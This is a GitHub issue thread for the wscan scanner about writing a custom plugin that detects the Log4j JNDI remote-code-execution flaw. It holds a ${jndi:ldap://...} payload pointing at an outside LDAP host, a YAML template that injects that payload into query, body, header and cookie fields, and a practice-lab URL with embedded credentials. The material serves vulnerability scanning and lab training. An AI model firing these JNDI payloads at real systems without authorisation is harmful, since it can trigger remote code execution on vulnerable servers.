### ISSUE TITLE
How to use custom plugins to perform log4j RCE vulnerability scans？

### ISSUE THREAD

**Issue by chushuai** [chushuai/wscan#19]
${jndi:ldap://xxx.xxx.xxx.xxxx:80/i/hcSvqI7U/71534c/303r/i9nl/PQ5P8iBh}

![image](https://github.com/chushuai/wscan/assets/5875458/42f77d3c-87c5-4938-890e-c4a6e72c949f)

Target practice location  https://zkaq:zkaq@d63bb2586.lab.aqlab.cn/

https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd

![image](https://github.com/chushuai/wscan/assets/5875458/ca8566da-3bb8-42ec-94a9-68ec370fb1ed)

**Comment by chushuai** [comment]
```
name: custom-reverse

set:
  reverse: newReverse()
  reverseURL: reverse.ldap_url

payload:
  -  ${jndi:{{reverseURL}}}

placeholder:
  - query
  - body
  - header
  - cookie

expression: reverse.wait(15)

detail:
  author: shaochuyu
  links:
    - https://github.com/chushuai/wscan
  version: 1.0

```
